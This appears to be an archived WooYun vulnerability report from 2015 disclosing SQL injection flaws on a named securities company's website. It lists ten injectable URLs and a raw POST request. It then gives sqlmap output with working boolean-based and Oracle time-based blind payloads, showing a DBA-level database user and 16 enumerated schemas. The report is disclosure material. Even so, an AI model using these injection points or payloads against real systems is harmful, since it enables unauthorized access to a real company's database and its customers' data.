乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-02: 细节已通知厂商并且等待厂商处理中 2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开
233
每次9rank,还走小厂,实在受不了了,这次全打包,希望走首,希望20rank!1,http://www.glsc.com.cn/glzq/mobileQuestion.do?method=listQuestionForPage&qType=tbAdvice*2,http://www.glsc.com.cn/glzq/jyzx/info_content.jsp?id=486551567207*3,http://www.glsc.com.cn/glzq/financing/management/new_y5.jsp?fundcode=B40325*4,http://www.glsc.com.cn/glzq/f10Action.do?codes=*1dV&method=getJTBshow&pagesize=7 5,POST /glzq/f10Action.do?method=gsgk HTTP/1.1Content-Length: 147Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.glsc.com.cnCookie: BIGipServerpool_guanwang=185655306.36895.0000; JSESSIONID=E7694F881AA86232A8EA45FDDFF84993; JSESSIONID=A20065C59B1BD74020792544C2612BD3; URID=3f04acbe-c18a-472b-972b-bcb754c5e99fHost: www.glsc.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*gpdm=*&searchgpdm=%e4%bb%a3%e7%a0%81/%e5%90%8d%e7%a7%b0/%e7%ae%80%e6%8b%bc&Submit3=%e6%9f%a5%e8%af%a26,http://www.glsc.com.cn/glzq/broker/salerQuery.jsp?dept=1&salername=*7,http://www.glsc.com.cn/glzq/broker/brokerQuery.jsp?brokerName=*8,http://www.glsc.com.cn/glzq/broker/advisorQuery.jsp?advisorName=*9,http://www.glsc.com.cn/glzq/broker/advisorQuery.jsp?advisorName=dexsfqfy&dept=*10,http://www.glsc.com.cn/glzq/newCms.do?method=getNewsPage&whichCat=gsdt参数:whicCat
---Parameter: qType (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=listQuestionForPage&qType=tbAdvice' AND 3765=3765 AND 'AlEv'='AlEv Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: method=listQuestionForPage&qType=tbAdvice' AND 5883=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(108)||CHR(109)||CHR(109),5) AND 'llit'='llit---[15:49:35] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oraclecurrent user: 'GLZQ'current user is DBA: Trueavailable databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] GLZQ[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XD
求20rank!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
危害等级:无影响厂商忽略
忽略时间:2015-06-07 16:04
漏洞Rank:15 (WooYun评价)
暂无